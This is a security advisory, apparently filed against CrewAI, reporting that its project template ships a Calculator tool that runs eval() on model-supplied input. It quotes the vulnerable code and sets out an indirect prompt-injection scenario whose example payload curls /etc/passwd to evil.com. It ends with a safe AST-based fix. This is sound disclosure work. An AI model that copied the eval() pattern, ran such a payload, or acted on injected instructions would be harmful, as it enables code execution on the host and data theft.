[Security] crewai create ships template with eval() on unsanitized LLM input
Summary
The AGENTS.md template bundled with CrewAI's project scaffolding (crewai create) includes a Calculator tool example that uses eval() on LLM-provided input, creating a remote code execution vulnerability in every new CrewAI project that follows the template.
Severity: MEDIUM
Rule: AGENT-053 — Unsafe Code Execution Pattern in Template
OWASP Agentic Security Index: ASI-09 — Improper Output Handling
Affected files:
lib/crewai/src/crewai/cli/templates/AGENTS.md (line 773)
Vulnerability Details
The AGENTS.md template shipped with crewai create demonstrates a Calculator tool pattern:
Affected code (cli/templates/AGENTS.md:770-774):
```python
@tool("Calculator")
def calculator(expression: str) -> str:
    """Evaluates a mathematical expression and returns the result."""
    return str(eval(expression))  # <-- arbitrary code execution
```
This template is copied into new user projects when running crewai create. Users following this pattern (or leaving it as-is) will have a tool that executes arbitrary Python code from LLM output.
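A minimal reproduction illustrates why this pattern is dangerous. The `__import__('os').name` payload here is a benign stand-in for the destructive calls an attacker would actually use:

```python
# eval() accepts any Python expression, not just arithmetic.
print(eval("2 + 3"))  # 5 -- the intended Calculator use

# A crafted "expression" reaches the os module just as easily.
# (Benign stand-in; an attacker would call os.system instead.)
print(eval("__import__('os').name"))
```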
Attack Scenario
- A user runs `crewai create my_project` and gets a project with this Calculator tool
- The user deploys their CrewAI agent (or uses it with web-sourced data)
- Through indirect prompt injection (e.g., a malicious document or website the agent processes), the LLM is tricked into calling the Calculator tool with a malicious expression:
  `calculator("__import__('os').system('curl https://evil.com/exfil?data=' + open('/etc/passwd').read())")`
- The `eval()` call executes arbitrary Python code on the host machine
Impact
- Remote code execution: Full Python code execution on the host system
- Data exfiltration: Access to filesystem, environment variables, credentials
- System compromise: Ability to install backdoors, modify files, pivot to internal networks
Suggested Fix
Replace `eval()` with a safe math expression evaluator. The `numexpr` library is an alternative for numeric expressions; note that `ast.literal_eval()` only parses literals and cannot evaluate arithmetic such as `2 * 3`, so it is not a substitute here. The implementation below requires no external dependencies:
```python
@tool("Calculator")
def calculator(expression: str) -> str:
    """Evaluates a mathematical expression and returns the result."""
    import ast
    import operator

    # Whitelist of safe arithmetic operators
    ops = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: operator.truediv,
        ast.Pow: operator.pow,
        ast.USub: operator.neg,
    }

    def _eval(node):
        if isinstance(node, ast.Expression):
            return _eval(node.body)
        elif isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        elif isinstance(node, ast.BinOp) and type(node.op) in ops:
            return ops[type(node.op)](_eval(node.left), _eval(node.right))
        elif isinstance(node, ast.UnaryOp) and type(node.op) in ops:
            return ops[type(node.op)](_eval(node.operand))
        raise ValueError(f"Unsupported expression: {ast.dump(node)}")

    tree = ast.parse(expression, mode="eval")
    return str(_eval(tree))
```
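The evaluator can be exercised outside a crew to confirm it accepts arithmetic and rejects code. This sketch drops the `@tool` decorator; `safe_calc` is an illustrative name, not part of the template:

```python
import ast
import operator

def safe_calc(expression: str) -> str:
    """Same AST-whitelist approach as the suggested fix, minus the @tool decorator."""
    ops = {
        ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv,
        ast.Pow: operator.pow, ast.USub: operator.neg,
    }

    def _eval(node):
        if isinstance(node, ast.Expression):
            return _eval(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in ops:
            return ops[type(node.op)](_eval(node.left), _eval(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in ops:
            return ops[type(node.op)](_eval(node.operand))
        raise ValueError(f"Unsupported expression: {ast.dump(node)}")

    return str(_eval(ast.parse(expression, mode="eval")))

print(safe_calc("2 + 3 * 4"))      # 14
print(safe_calc("-(2 ** 3) / 4"))  # -2.0

# The injection payload from the attack scenario is now rejected:
try:
    safe_calc("__import__('os').system('id')")
except ValueError as e:
    print("rejected:", e)
```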
Fix approach: Replace eval() with an AST-based safe math evaluator that only supports arithmetic operators and numeric literals. This preserves the Calculator functionality while preventing arbitrary code execution.
Detection
This issue was identified by agent-audit, an open-source security scanner for AI agent code. agent-audit detects agent-specific vulnerabilities that traditional SAST tools (Semgrep, Bandit) miss — including unsafe tool definitions, MCP configuration issues, and trust boundary violations mapped to the OWASP Agentic Security Index.